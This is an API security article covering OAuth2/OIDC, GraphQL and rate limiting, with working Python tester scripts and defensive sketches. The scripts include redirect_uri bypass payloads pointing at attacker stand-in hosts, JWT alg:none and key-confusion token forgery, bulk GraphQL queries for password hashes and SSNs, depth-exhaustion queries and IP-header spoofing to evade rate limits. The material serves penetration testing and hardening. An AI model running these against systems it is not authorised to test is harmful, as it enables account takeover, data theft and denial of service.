
Web API Security Deep Dive: A Full Analysis from OAuth2 Bypasses to GraphQL Injection

Author: Elone Yue

Executive Summary
#

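APIs sit at the core of modern web applications. RESTful, GraphQL, and gRPC interfaces carry the data flows and business logic, and they are also the entry points with the broadest attack surface and the densest concentration of vulnerabilities. In the OWASP API Security Top 10 (2023), BOLA (Broken Object Level Authorization) again ranks first, as it did in the 2019 edition. This article examines OAuth2/OIDC authentication bypasses, GraphQL injection attacks, rate limiting bypasses, and hands-on API gateway hardening.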

OAuth 2.0 and OIDC in Depth
#

OAuth 2.0 Authorization Code Flow
#

The standard OAuth 2.0 authorization code flow (RFC 6749) consists of the following steps:

    Client                Authorization Server          Resource Server
      │                            │                          │
      │  (1) Authorization Request │                          │
      │───────────────────────────►│                          │
      │  redirect_uri + client_id  │                          │
      │                            │                          │
      │  (2) User Authentication   │                          │
      │◄───────────────────────────┤                          │
      │  login + consent           │                          │
      │                            │                          │
      │  (3) Authorization Code    │                          │
      │◄───────────────────────────┤                          │
      │  code=abc123&state=xyz     │                          │
      │                            │                          │
      │  (4) Token Request         │                          │
      │───────────────────────────►│                          │
      │  code + client_secret      │                          │
      │                            │                          │
      │  (5) Access + Refresh Token│                          │
      │◄───────────────────────────┤                          │
      │                            │                          │
      │  (6) API Request           │                          │
      │──────────────────────────────────────────────────────►│
      │  Authorization: Bearer <token>                        │
      │                            │                          │
      │  (7) Resource Response     │                          │
      │◄──────────────────────────────────────────────────────│

PKCE (Proof Key for Code Exchange)
#

PKCE (RFC 7636) protects public clients (mobile apps, SPAs) against interception of the authorization code during the code exchange:

    client                        authorization server
      │                                 │
      │  code_verifier = random(43-128) │
      │  code_challenge = BASE64URL(SHA256(code_verifier))
      │                                 │
      │  Auth Request + code_challenge  │
      │  &code_challenge_method=S256    │
      │────────────────────────────────►│
      │                                 │
      │  Authorization Code             │
      │◄────────────────────────────────┤
      │                                 │
      │  Token Request                  │
      │  + code_verifier                │
      │────────────────────────────────►│
      │                                 │
      │  server verifies:               │
      │  SHA256(code_verifier) ==       │
      │  stored code_challenge          │
      │                                 │
      │  Access Token                   │
      │◄────────────────────────────────┤

A Go client that implements PKCE:

package oauth

import (
    "crypto/rand"
    "crypto/sha256"
    "encoding/base64"
    "fmt"
    "net/http"
    "net/url"
    "strings"
)

// PKCE generates code_verifier and code_challenge for OAuth 2.0 PKCE
type PKCE struct {
    CodeVerifier  string
    CodeChallenge string
}

// GeneratePKCE creates a new PKCE challenge pair
func GeneratePKCE() (*PKCE, error) {
    verifierBytes := make([]byte, 32)
    if _, err := rand.Read(verifierBytes); err != nil {
        return nil, fmt.Errorf("failed to generate random bytes: %w", err)
    }

    verifier := base64.RawURLEncoding.EncodeToString(verifierBytes)

    hash := sha256.Sum256([]byte(verifier))
    challenge := base64.RawURLEncoding.EncodeToString(hash[:])

    return &PKCE{
        CodeVerifier:  verifier,
        CodeChallenge: challenge,
    }, nil
}

// BuildAuthorizationURL constructs the OAuth authorization URL with PKCE
func BuildAuthorizationURL(baseURL, clientID, redirectURI, state string, pkce *PKCE) string {
    params := url.Values{}
    params.Set("response_type", "code")
    params.Set("client_id", clientID)
    params.Set("redirect_uri", redirectURI)
    params.Set("state", state)
    params.Set("code_challenge", pkce.CodeChallenge)
    params.Set("code_challenge_method", "S256")
    params.Set("scope", "openid profile email")

    return fmt.Sprintf("%s/authorize?%s", baseURL, params.Encode())
}

// BuildTokenRequest constructs the token exchange request with PKCE verifier
func BuildTokenRequest(baseURL, clientID, code, redirectURI, codeVerifier string) (*http.Request, error) {
    data := url.Values{}
    data.Set("grant_type", "authorization_code")
    data.Set("client_id", clientID)
    data.Set("code", code)
    data.Set("redirect_uri", redirectURI)
    data.Set("code_verifier", codeVerifier)

    // Propagate the error instead of discarding it (for example, a malformed baseURL)
    req, err := http.NewRequest(http.MethodPost, baseURL+"/token",
        strings.NewReader(data.Encode()))
    if err != nil {
        return nil, fmt.Errorf("failed to build token request: %w", err)
    }
    req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
    return req, nil
}
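
The server-side half of the PKCE diagram (comparing SHA256(code_verifier) with the stored code_challenge) can be sketched in Python as follows. This is a minimal illustration under stated assumptions rather than a complete token endpoint: the function names `s256_challenge` and `verify_pkce` are hypothetical, and only the `S256` method is handled.

```python
import base64
import hashlib
import hmac


def s256_challenge(code_verifier: str) -> str:
    """Compute BASE64URL(SHA256(code_verifier)) without padding (RFC 7636, S256)."""
    digest = hashlib.sha256(code_verifier.encode("ascii")).digest()
    return base64.urlsafe_b64encode(digest).rstrip(b"=").decode("ascii")


def verify_pkce(code_verifier: str, stored_challenge: str) -> bool:
    """Return True if the verifier sent with the token request matches the stored challenge."""
    # RFC 7636 requires the verifier to be 43 to 128 characters long.
    if not 43 <= len(code_verifier) <= 128:
        return False
    try:
        computed = s256_challenge(code_verifier)
    except UnicodeEncodeError:
        return False  # verifiers are restricted to an ASCII alphabet
    # Constant-time comparison avoids leaking how many characters matched.
    return hmac.compare_digest(computed.encode(), stored_challenge.encode())
```

The authorization server would call `verify_pkce` with the `code_verifier` from the token request and the `code_challenge` it stored when issuing the authorization code, and refuse to issue tokens when it returns False.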

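OAuth 2.0 Vulnerabilities and Bypass Techniques
#

1. Redirect URI Manipulation
#

Redirect URI manipulation is one of the most common OAuth vulnerabilities. When the authorization server does not require an exact match on redirect_uri, an attacker can intercept the authorization code: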

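import urllib.parse

import requests

# redirect_uri bypass techniques
BYPASS_PATTERNS = [
    # Substring-match bypass: the legitimate URL is embedded in an attacker URL's query string
    "https://evil.attacker.com?redirect=https://legitimate-app.com/callback",

    # Open redirect chaining
    "https://legitimate-app.com/redirect?url=https://evil.attacker.com",

    # Double URL encoding
    "https://legitimate%252ecom.attacker.com",

    # Prefix-match bypass: the attacker's domain starts with the legitimate host name
    "https://legitimate-app.com.evil.com/callback",

    # Case variation (some implementations compare case-insensitively)
    "https://LEGITIMATE-app.com/callback",

    # Fragment injection
    "https://legitimate-app.com/callback#https://evil.attacker.com",

    # Userinfo (@) trick: the actual host is evil.attacker.com
    "https://legitimate-app.com@evil.attacker.com",
]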

def test_redirect_uri_vulnerability(base_url, client_id):
    """Test various redirect URI bypass techniques."""
    results = []
    for uri in BYPASS_PATTERNS:
        auth_url = (
            f"{base_url}/authorize?"
            f"response_type=code"
            f"&client_id={client_id}"
            f"&redirect_uri={urllib.parse.quote_plus(uri)}"
            f"&state=test123"
        )
        resp = requests.get(auth_url, allow_redirects=False)
        if resp.status_code == 302:
            location = resp.headers.get("Location", "")
            if "error" not in location.lower():
                results.append({
                    "pattern": uri,
                    "status": resp.status_code,
                    "location": location,
                    "vulnerable": True
                })
    return results
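
On the defensive side, all of the patterns above fail against an exact string comparison with the registered redirect URIs. The following is a minimal sketch of that check; `is_redirect_uri_allowed` and the `REGISTERED` list are hypothetical names used only for illustration, not part of any particular authorization server.

```python
from typing import Iterable

# Hypothetical registration data for one client.
REGISTERED = ["https://legitimate-app.com/callback"]


def is_redirect_uri_allowed(candidate: str, registered: Iterable[str]) -> bool:
    """Allow a redirect_uri only if it is identical to a registered value."""
    # No prefix, substring, case-insensitive, or wildcard matching:
    # the candidate must equal a registered URI character for character.
    return candidate in set(registered)
```

Because the comparison is done on the raw string, no URL parsing or normalization step exists for an attacker to confuse.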

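2. Token Leakage
#

Common token leakage scenarios:

  • access_token in URL parameters: a token placed in the URL ends up in browser history, proxy logs, and the Referer header
  • Implicit grant type: the token is returned in the URL fragment, where XSS or a browser extension can intercept it
  • Tokens written to logs: many applications print complete request headers in their logs

# Detect token leakage: search log files for token patterns
$ grep -rE "access_token=[\"']?[A-Za-z0-9._-]{20,}" /var/log/nginx/ --include="*.log"
$ grep -rE 'Bearer[[:space:]]+[A-Za-z0-9._-]{20,}' /var/log/app/ --include="*.log"

# Search the code repository for hard-coded tokens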
$ trufflehog filesystem --no-update --fail /path/to/repo
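
Detection can be complemented by redacting tokens before a line ever reaches the log. The sketch below shows one way to do that with regular expressions; the function name `redact_tokens` and the list of parameter names are assumptions for illustration, and the patterns would need to be adapted to the token formats actually in use.

```python
import re

# Bearer credentials in header dumps, e.g. "Authorization: Bearer <token>"
_BEARER_RE = re.compile(r"(Bearer\s+)[A-Za-z0-9._~+/-]+=*", re.IGNORECASE)
# Tokens carried as URL or form parameters
_PARAM_RE = re.compile(r"((?:access_token|refresh_token|id_token)=)[^&\s\"']+")


def redact_tokens(line: str) -> str:
    """Replace token values in a log line with a fixed placeholder."""
    line = _BEARER_RE.sub(r"\1[REDACTED]", line)
    return _PARAM_RE.sub(r"\1[REDACTED]", line)
```

A function like this could be wired into a logging filter so that request headers and URLs are scrubbed in one place.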

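3. State Parameter Bypass
#

If the client application does not validate the state parameter, an attacker can mount a CSRF attack against the OAuth flow: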

#!/usr/bin/env python3
"""
oauth_csrf_tester.py - Test OAuth state parameter validation
"""

import requests
import urllib.parse
from typing import Dict, Optional


class OAuthCSRFSampler:
    """Test for OAuth CSRF vulnerabilities."""

    def __init__(self, auth_server: str, client_id: str, redirect_uri: str):
        self.auth_server = auth_server
        self.client_id = client_id
        self.redirect_uri = redirect_uri

    def test_missing_state(self) -> Dict:
        """Test if authorization works without state parameter."""
        params = {
            "response_type": "code",
            "client_id": self.client_id,
            "redirect_uri": self.redirect_uri,
            # state intentionally omitted
        }
        url = f"{self.auth_server}/authorize?{urllib.parse.urlencode(params)}"
        resp = requests.get(url, allow_redirects=False)

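        location = resp.headers.get("Location", "")
        redirects_to_callback = resp.status_code == 302 and self.redirect_uri in location
        return {
            "test": "missing_state",
            "status_code": resp.status_code,
            "redirects_to_callback": redirects_to_callback,
            # A 302 to a login page is not a finding; only a redirect to the callback counts
            "vulnerable": redirects_to_callback,
        }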

    def test_empty_state(self) -> Dict:
        """Test if empty state is accepted."""
        params = {
            "response_type": "code",
            "client_id": self.client_id,
            "redirect_uri": self.redirect_uri,
            "state": "",
        }
        url = f"{self.auth_server}/authorize?{urllib.parse.urlencode(params)}"
        resp = requests.get(url, allow_redirects=False)

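        location = resp.headers.get("Location", "")
        redirects_to_callback = resp.status_code == 302 and self.redirect_uri in location
        return {
            "test": "empty_state",
            "status_code": resp.status_code,
            "redirects_to_callback": redirects_to_callback,
            # A 302 to a login page is not a finding; only a redirect to the callback counts
            "vulnerable": redirects_to_callback,
        }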

    def test_state_prediction(self, code: str) -> Dict:
        """Test if state value can be predicted or reused."""
        # Try common state patterns
        states_to_try = ["", "1", "test", code[:10], code[-10:]]

        for state_val in states_to_try:
            params = {
                "response_type": "code",
                "client_id": self.client_id,
                "redirect_uri": self.redirect_uri,
                "state": state_val,
            }
            url = f"{self.auth_server}/authorize?{urllib.parse.urlencode(params)}"
            resp = requests.get(url, allow_redirects=False)

            if resp.status_code == 302:
                return {
                    "test": "state_prediction",
                    "tried_state": state_val,
                    "vulnerable": True,
                    "redirect": resp.headers.get("Location"),
                }

        return {"test": "state_prediction", "vulnerable": False}

    def run_all_tests(self) -> Dict:
        """Run all CSRF-related OAuth tests."""
        results = {
            "target": self.auth_server,
            "tests": [
                self.test_missing_state(),
                self.test_empty_state(),
            ],
        }
        return results
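
For contrast with the tests above, the client-side defense is small: generate an unpredictable state per authorization request, bind it to the user's session, and require an exact single-use match on the callback. The following is a minimal sketch under the assumption that `session` is any per-user mutable mapping (a plain dict here); `issue_state` and `validate_state` are hypothetical helper names.

```python
import hmac
import secrets
from typing import MutableMapping, Optional


def issue_state(session: MutableMapping[str, str]) -> str:
    """Create an unpredictable state value and bind it to the user's session."""
    state = secrets.token_urlsafe(32)
    session["oauth_state"] = state
    return state


def validate_state(session: MutableMapping[str, str],
                   returned_state: Optional[str]) -> bool:
    """Check the state returned on the callback; each value is valid once."""
    expected = session.pop("oauth_state", None)  # pop makes the value single-use
    if not expected or not returned_state:
        return False  # missing or empty state is always rejected
    return hmac.compare_digest(expected.encode(), returned_state.encode())
```

The callback handler would call `validate_state` before exchanging the authorization code and abort the flow when it returns False.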

4. JWT Exploitation
#

OIDC uses JWTs as ID Tokens. Common vulnerabilities include:

#!/usr/bin/env python3
"""
jwt_security_tester.py - Test JWT vulnerabilities in OIDC implementations
"""

import json
import base64
import hmac
import hashlib
from typing import Optional, Dict


class JWTTester:
    """Test common JWT security vulnerabilities."""

    @staticmethod
    def decode_jwt_unverified(token: str) -> Dict:
        """Decode JWT without verification (for analysis)."""
        parts = token.split(".")
        if len(parts) != 3:
            raise ValueError("Invalid JWT format")

        def decode_segment(seg):
            # Add padding
            padding = 4 - len(seg) % 4
            if padding != 4:
                seg += "=" * padding
            return json.loads(base64.urlsafe_b64decode(seg))

        return {
            "header": decode_segment(parts[0]),
            "payload": decode_segment(parts[1]),
            "signature": parts[2],
        }

    def test_alg_none(self, token: str) -> bool:
        """Test if 'alg: none' is accepted."""
        decoded = self.decode_jwt_unverified(token)
        header = decoded["header"]

        if header.get("alg") == "none":
            print("[!] JWT header uses 'alg: none' - signature is not verified")
            return True

        # Attempt alg:none attack
        header["alg"] = "none"
        new_header = base64.urlsafe_b64encode(
            json.dumps(header).encode()
        ).rstrip(b"=").decode()

        payload = token.split(".")[1]
        forged_token = f"{new_header}.{payload}."

        print(f"[*] Forged 'alg:none' token: {forged_token[:50]}...")
        return False  # Need to test against the actual server

    def test_key_confusion(self, token: str, public_key: bytes) -> Optional[str]:
        """Test RS256/HS256 key confusion attack."""
        decoded = self.decode_jwt_unverified(token)

        if decoded["header"].get("alg") != "RS256":
            return None

        # Try to sign with the public key using HMAC
        header = decoded["header"]
        header["alg"] = "HS256"
        new_header = base64.urlsafe_b64encode(
            json.dumps(header).encode()
        ).rstrip(b"=").decode()

        payload = token.split(".")[1]
        signing_input = f"{new_header}.{payload}"

        forged_sig = base64.urlsafe_b64encode(
            hmac.new(public_key, signing_input.encode(), hashlib.sha256).digest()
        ).rstrip(b"=").decode()

        forged_token = f"{signing_input}.{forged_sig}"
        return forged_token

    def test_jwk_header_injection(self, token: str) -> bool:
        """Test JWK header injection (CVE-2018-0114 / CVE-2018-1000583)."""
        decoded = self.decode_jwt_unverified(token)
        header = decoded["header"]

        # Check if jwk or jku is in the header
        if "jwk" in header or "jku" in header:
            print(f"[!] JWT uses {'jwk' if 'jwk' in header else 'jku'} header")
            print(f"    Header: {json.dumps(header, indent=2)}")
            return True
        return False

    def analyze_token(self, token: str) -> Dict:
        """Full JWT analysis."""
        decoded = self.decode_jwt_unverified(token)

        analysis = {
            "algorithm": decoded["header"].get("alg", "unknown"),
            "type": decoded["header"].get("typ", "unknown"),
            "issuer": decoded["payload"].get("iss"),
            "audience": decoded["payload"].get("aud"),
            "subject": decoded["payload"].get("sub"),
            "expires_at": decoded["payload"].get("exp"),
            "issued_at": decoded["payload"].get("iat"),
            "has_jwk": "jwk" in decoded["header"],
            "has_jku": "jku" in decoded["header"],
            "has_x5u": "x5u" in decoded["header"],
            "custom_claims": [
                k for k in decoded["payload"].keys()
                if k not in ["iss", "sub", "aud", "exp", "iat", "nbf", "jti",
                             "email", "email_verified", "name", "picture"]
            ],
        }

        return analysis

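GraphQL Security in Depth
#

Introspection Query Abuse
#

GraphQL's introspection mechanism lets clients query schema information. This is very useful in development, but in production it becomes a source of information disclosure:

# Standard introspection query: retrieves the complete schema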
query IntrospectionQuery {
  __schema {
    queryType { name }
    mutationType { name }
    types {
      ...FullType
    }
  }
}

fragment FullType on __Type {
  kind
  name
  description
  fields(includeDeprecated: true) {
    name
    description
    args {
      ...InputValue
    }
    type {
      ...TypeRef
    }
    isDeprecated
    deprecationReason
  }
  inputFields {
    ...InputValue
  }
  interfaces {
    ...TypeRef
  }
  enumValues(includeDeprecated: true) {
    name
    description
    isDeprecated
    deprecationReason
  }
  possibleTypes {
    ...TypeRef
  }
}

fragment InputValue on __InputValue {
  name
  description
  type { ...TypeRef }
  defaultValue
}

fragment TypeRef on __Type {
  kind
  name
  ofType {
    kind
    name
    ofType {
      kind
      name
      ofType {
        kind
        name
        ofType {
          kind
          name
        }
      }
    }
  }
}

A Python script that automates introspection:

#!/usr/bin/env python3
"""
graphql_recon.py - GraphQL introspection and reconnaissance tool
"""

import json
import requests
from typing import Dict, List, Optional, Tuple


class GraphQLRecon:
    """GraphQL endpoint reconnaissance and vulnerability discovery."""

    INTROSPECTION_QUERY = """
    query {
      __schema {
        queryType { name }
        mutationType { name }
        types {
          kind
          name
          fields { name args { name type { name kind ofType { name } } } type { name kind ofType { name } } }
          inputFields { name type { name kind ofType { name } } }
          enumValues { name }
        }
        directives { name locations args { name type { name } } }
      }
    }
    """

    def __init__(self, endpoint: str, headers: Optional[Dict] = None):
        self.endpoint = endpoint
        self.headers = headers or {
            "Content-Type": "application/json",
            "Accept": "application/json",
        }
        self.schema_info = {}

    def check_introspection(self) -> bool:
        """Check if introspection is enabled."""
        try:
            resp = requests.post(
                self.endpoint,
                json={"query": self.INTROSPECTION_QUERY},
                headers=self.headers,
                timeout=10,
            )
            if resp.status_code == 200:
                data = resp.json()
                # "data" may be present but null when the server rejects the query
                if "__schema" in (data.get("data") or {}):
                    self.schema_info = data["data"]["__schema"]
                    return True
            # Any other outcome (errors, non-200) is treated as introspection disabled
            return False
        except requests.RequestException as e:
            print(f"[-] Request failed: {e}")
            return False

    def enumerate_types(self) -> List[Dict]:
        """Enumerate all types from the schema."""
        if not self.schema_info:
            return []

        types = []
        for t in self.schema_info.get("types", []):
            if t["name"].startswith("__"):
                continue  # Skip internal types
            types.append({
                "name": t["name"],
                "kind": t["kind"],
                "fields": [f["name"] for f in (t.get("fields") or [])],
                "input_fields": [f["name"] for f in (t.get("inputFields") or [])],
                "enum_values": [e["name"] for e in (t.get("enumValues") or [])],
            })
        return types

    def enumerate_queries(self) -> List[Dict]:
        """List all available queries."""
        if not self.schema_info:
            return []

        query_type_name = self.schema_info.get("queryType", {}).get("name", "Query")
        for t in self.schema_info.get("types", []):
            if t["name"] == query_type_name:
                return [
                    {
                        "name": f["name"],
                        "args": [
                            {
                                "name": a["name"],
                                "type": a["type"].get("name") or
                                    a["type"].get("ofType", {}).get("name"),
                            }
                            for a in (f.get("args") or [])
                        ],
                    }
                    for f in (t.get("fields") or [])
                ]
        return []

    def enumerate_mutations(self) -> List[Dict]:
        """List all available mutations."""
        if not self.schema_info:
            return []

        mutation_type = self.schema_info.get("mutationType")
        if not mutation_type:
            return []

        mutation_type_name = mutation_type.get("name", "Mutation")
        for t in self.schema_info.get("types", []):
            if t["name"] == mutation_type_name:
                return [
                    {
                        "name": f["name"],
                        "args": [
                            {
                                "name": a["name"],
                                "type": a["type"].get("name") or
                                    a["type"].get("ofType", {}).get("name"),
                            }
                            for a in (f.get("args") or [])
                        ],
                    }
                    for f in (t.get("fields") or [])
                ]
        return []

    def test_batch_query(self, query: str, variables: Optional[Dict] = None, batch_size: int = 10) -> Dict:
        """Test GraphQL batch query processing."""
        batch = [{"query": query, "variables": variables} for _ in range(batch_size)]

        resp = requests.post(
            self.endpoint,
            json=batch,
            headers=self.headers,
            timeout=15,
        )

        try:
            body = resp.json()  # parse once; the body may not be JSON at all
        except ValueError:
            body = None
        is_batch = isinstance(body, list)

        return {
            "status_code": resp.status_code,
            "batch_supported": resp.status_code == 200 and is_batch,
            "response_count": len(body) if is_batch else 1,
            "response": resp.text[:500],
        }

    def test_depth_exhaustion(self, max_depth: int = 20) -> Dict:
        """Test for GraphQL depth exhaustion (DoS)."""
        import time

        # Build a deeply nested query. `Node` and `children` are placeholder
        # names; substitute a self-referencing field from the target schema.
        def build_nested_query(type_name: str, depth: int) -> str:
            if depth <= 0:
                return "id"
            return f"""
            {type_name} {{
                id
                children {{
                    {build_nested_query(type_name, depth - 1)}
                }}
            }}
            """

        results = {}
        for depth in [5, 10, 15, max_depth]:
            query = f"query {{ {build_nested_query('Node', depth)} }}"
            start = time.time()
            try:
                resp = requests.post(
                    self.endpoint,
                    json={"query": query},
                    headers=self.headers,
                    timeout=30,
                )
                elapsed = time.time() - start
                results[depth] = {
                    "status": resp.status_code,
                    "elapsed_seconds": round(elapsed, 3),
                    "error": "timeout" if elapsed >= 30 else None,
                }
            except requests.Timeout:
                results[depth] = {
                    "status": "timeout",
                    "elapsed_seconds": 30,
                    "error": "timeout",
                }

        return results

    def run_recon(self) -> Dict:
        """Run full reconnaissance."""
        print(f"[*] Checking introspection at {self.endpoint}...")
        introspection_enabled = self.check_introspection()

        if not introspection_enabled:
            print("[-] Introspection is disabled")
            return {"introspection": False}

        print(f"[+] Introspection enabled. Enumerating schema...")

        return {
            "introspection": True,
            "queries": self.enumerate_queries(),
            "mutations": self.enumerate_mutations(),
            "types": self.enumerate_types(),
        }


if __name__ == "__main__":
    import sys

    endpoint = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:4000/graphql"
    recon = GraphQLRecon(endpoint)
    results = recon.run_recon()

    if results.get("introspection"):
        print(f"\n[+] Found {len(results['queries'])} queries")
        print(f"[+] Found {len(results['mutations'])} mutations")
        print(f"[+] Found {len(results['types'])} types")

        for q in results["queries"]:
            print(f"    Query: {q['name']}")
        for m in results["mutations"]:
            print(f"    Mutation: {m['name']}")

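Batch Query Attacks
#

GraphQL allows multiple operations to be sent in a single request. Without limits, an attacker can:

  1. Bypass rate limiting: execute many operations in one request
  2. Brute-force credentials: run login queries in bulk
  3. Exfiltrate data in bulk: retrieve large amounts of data at once

# Batch attack examples
BATCH_ATTACKS = [
    # Aliased batch query: bypasses per-request rate limits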
    {
        "query": """
        query {
          user1: user(id: "1") { email password_hash }
          user2: user(id: "2") { email password_hash }
          user3: user(id: "3") { email password_hash }
          user4: user(id: "4") { email password_hash }
          user5: user(id: "5") { email password_hash }
        }
        """
    },

    # Alias obfuscation: attempts to bypass field-level authorization
    {
        "query": """
        query {
          a: user(id: "1") { email }
          b: user(id: "1") { ssn }
          c: user(id: "1") { creditCard }
        }
        """
    },
]
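
One mitigation for array-style batching is to cap the batch size and charge the rate limiter per operation rather than per HTTP request. The sketch below shows the idea for a decoded JSON request body; `MAX_BATCH_SIZE`, `operation_count`, and `check_batch` are hypothetical names, and the limit of 5 is an arbitrary illustrative value. It does not cover alias-based batching inside a single query, which needs query cost analysis in the GraphQL server itself.

```python
from typing import Any

MAX_BATCH_SIZE = 5  # hypothetical limit; tune per deployment


def operation_count(body: Any) -> int:
    """Number of GraphQL operations in a decoded JSON request body."""
    # A JSON array is a batch; a single JSON object is one operation.
    if isinstance(body, list):
        return len(body)
    return 1


def check_batch(body: Any, max_batch: int = MAX_BATCH_SIZE) -> int:
    """Return the cost to charge against the rate limiter, or raise if too large."""
    count = operation_count(body)
    if count == 0 or count > max_batch:
        raise ValueError(f"batch of {count} operations rejected")
    return count
```

The returned count would be passed to the rate limiter as the request's cost, so that ten batched login attempts consume ten units of quota instead of one.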

Depth Exhaustion Attacks
#

Nested GraphQL queries can be built with exponential complexity, leading to DoS:

# Depth exhaustion attack: a deeply nested query
query DeepRecursion {
  departments {
    employees {
      manager {
        department {
          employees {
            manager {
              department {
                # ... can be nested arbitrarily deep
                employees {
                  salary
                  ssn
                }
              }
            }
          }
        }
      }
    }
  }
}
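
A common defense is to reject queries whose nesting exceeds a fixed depth before they are executed. The sketch below approximates that check by counting braces in the query text; `query_depth` is a hypothetical helper, not part of any GraphQL library. It is deliberately crude: it does not follow fragment spreads, it counts input object literals in arguments as nesting (so it may overestimate), and block strings containing quotes can confuse it. A production server would normally use an AST-based depth or cost validation rule instead.

```python
def query_depth(query: str) -> int:
    """Return the maximum brace nesting depth of a GraphQL document."""
    depth = 0
    max_depth = 0
    in_string = False
    i = 0
    while i < len(query):
        ch = query[i]
        if in_string:
            if ch == "\\":
                i += 1  # skip the escaped character
            elif ch == '"':
                in_string = False
        elif ch == '"':
            in_string = True
        elif ch == "#":
            # Comment: ignore everything up to the end of the line
            while i < len(query) and query[i] != "\n":
                i += 1
            continue
        elif ch == "{":
            depth += 1
            max_depth = max(max_depth, depth)
        elif ch == "}":
            depth -= 1
        i += 1
    return max_depth
```

A gateway or middleware could compare the result with a configured limit and return an error for requests that exceed it.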

Rate Limiting Bypass Techniques
#

IP Spoofing Headers
#

#!/usr/bin/env python3
"""
rate_limit_bypass.py - Test rate limiting bypass techniques
"""

import requests
import time
from itertools import product
from typing import Dict, List


class RateLimitBypassTester:
    """Test various rate limiting bypass techniques."""

    # Common IP forwarding headers that some gateways trust
    IP_HEADERS = [
        "X-Forwarded-For",
        "X-Real-IP",
        "X-Client-IP",
        "X-Forwarded",
        "Forwarded",
        "X-Cluster-Client-IP",
        "X-Original-Remote-Addr",
        "CF-Connecting-IP",          # Cloudflare
        "True-Client-IP",            # Akamai
        "Fastly-Client-Ip",          # Fastly
        "WL-Proxy-Client-IP",        # WebLogic
    ]

    # Common bypass IP values
    BYPASS_IPS = [
        "127.0.0.1",
        "localhost",
        "10.0.0.1",
        "192.168.1.1",
        "172.16.0.1",
        "0.0.0.0",
        "::1",
        # Multi-IP chain (some gateways use first IP)
        "127.0.0.1, 8.8.8.8",
        "10.0.0.1, 8.8.8.8",
    ]

    def __init__(self, target_url: str, method: str = "POST",
                 payload: Dict = None, headers: Dict = None):
        self.target_url = target_url
        self.method = method.upper()
        self.payload = payload or {}
        self.default_headers = headers or {"Content-Type": "application/json"}

    def test_ip_header_spoofing(self, num_requests: int = 5) -> List[Dict]:
        """Test if spoofing IP headers bypasses rate limiting."""
        results = []

        for header in self.IP_HEADERS:
            for ip in self.BYPASS_IPS:
                test_headers = self.default_headers.copy()
                test_headers[header] = ip

                try:
                    if self.method == "POST":
                        resp = requests.post(
                            self.target_url,
                            json=self.payload,
                            headers=test_headers,
                            timeout=10,
                        )
                    else:
                        resp = requests.get(
                            self.target_url,
                            headers=test_headers,
                            timeout=10,
                        )

                    is_rate_limited = resp.status_code in (429, 503)

                    results.append({
                        "header": header,
                        "ip": ip,
                        "status": resp.status_code,
                        "rate_limited": is_rate_limited,
                        "rate_limit_remaining": resp.headers.get("X-RateLimit-Remaining"),
                        "rate_limit_reset": resp.headers.get("X-RateLimit-Reset"),
                        "retry_after": resp.headers.get("Retry-After"),
                        # Only meaningful if requests without the spoofed header
                        # were already being rate limited before this test
                        "bypass_successful": not is_rate_limited,
                    })
                except requests.RequestException as e:
                    results.append({
                        "header": header,
                        "ip": ip,
                        "error": str(e),
                    })

        return results

    def test_parameter_pollution(self, num_requests: int = 5) -> List[Dict]:
        """Test HTTP parameter pollution for rate limit bypass."""
        results = []

        # Test with duplicate parameters
        pollution_variants = [
            {"api_key": ["key1", "key2"]},
            {"user_id": ["1", "2", "3"]},
            {"token": ["a" * 32, "b" * 32]},
        ]

        for variant in pollution_variants:
            payload = self.payload.copy()
            payload.update(variant)

            resp = requests.post(
                self.target_url,
                json=payload,
                headers=self.default_headers,
                timeout=10,
            )

            results.append({
                "variant": str(variant),
                "status": resp.status_code,
                "rate_limited": resp.status_code in (429, 503),
            })

        return results

    def test_timing_based_bypass(self, interval: float = 0.5,
                                  num_requests: int = 20) -> List[Dict]:
        """Test if slow-and-steady requests bypass rate limits."""
        results = []

        for i in range(num_requests):
            start = time.time()
            resp = requests.post(
                self.target_url,
                json=self.payload,
                headers=self.default_headers,
                timeout=10,
            )
            elapsed = time.time() - start

            results.append({
                "request_number": i + 1,
                "interval": interval,
                "status": resp.status_code,
                "elapsed": round(elapsed, 3),
                "rate_limited": resp.status_code in (429, 503),
            })

            time.sleep(interval)

        return results

    def run_full_test(self) -> Dict:
        """Run all rate limiting bypass tests."""
        print(f"[*] Testing rate limit bypass against {self.target_url}")
        print(f"[*] Phase 1: IP header spoofing...")
        ip_results = self.test_ip_header_spoofing()

        successful_bypasses = [r for r in ip_results if r.get("bypass_successful")]
        print(f"    Found {len(successful_bypasses)} potential bypasses")

        print(f"[*] Phase 2: Parameter pollution...")
        pollution_results = self.test_parameter_pollution()

        print(f"[*] Phase 3: Timing-based bypass...")
        timing_results = self.test_timing_based_bypass()

        return {
            "ip_spoofing": ip_results,
            "parameter_pollution": pollution_results,
            "timing": timing_results,
        }
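
The header spoofing tests above succeed when the rate limiter keys on a client-supplied header. A server-side counterpart is to honor X-Forwarded-For only when the connection comes from a known proxy, and to read the chain from right to left. The sketch below illustrates this; `resolve_client_ip` and its parameters are hypothetical names, and it assumes every trusted proxy appends the address of its direct peer to the header.

```python
import ipaddress
from typing import Iterable, Optional


def resolve_client_ip(remote_addr: str,
                      x_forwarded_for: Optional[str],
                      trusted_proxies: Iterable[str]) -> str:
    """Pick the address to use as the rate-limit key."""
    networks = [ipaddress.ip_network(n) for n in trusted_proxies]

    def is_trusted(addr: str) -> bool:
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            return False
        return any(ip in net for net in networks)

    # A direct connection from an untrusted peer: ignore forwarding headers.
    if not is_trusted(remote_addr) or not x_forwarded_for:
        return remote_addr

    # Walk the chain right to left; the first untrusted hop is the client.
    hops = [h.strip() for h in x_forwarded_for.split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            ipaddress.ip_address(hop)
        except ValueError:
            return remote_addr  # malformed entry: fall back to the socket peer
        if not is_trusted(hop):
            return hop
    return remote_addr
```

With this approach, values an attacker prepends to the header (such as 127.0.0.1) are never reached, because the walk stops at the first address that a trusted proxy recorded.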

API Gateway Security Hardening
#

Kong Gateway Security Configuration
#

# kong.yaml - Secure Kong gateway configuration
_format_version: "3.0"

services:
  - name: api-backend
    url: http://backend:8080
    routes:
      - name: api-route
        paths:
          - /api/
        strip_path: false

    plugins:
      # Rate limiting
      - name: rate-limiting
        config:
          second: 100
          minute: 5000
          hour: 100000
          policy: redis
          redis:
            host: redis-rate-limit
            port: 6379

      # Request size limit
      - name: request-size-limiting
        config:
          allowed_payload_size: 1  # 1 MB
          size_unit: megabytes

      # CORS
      - name: cors
        config:
          origins:
            - "https://app.techorigin.dev"
          methods:
            - GET
            - POST
          headers:
            - Authorization
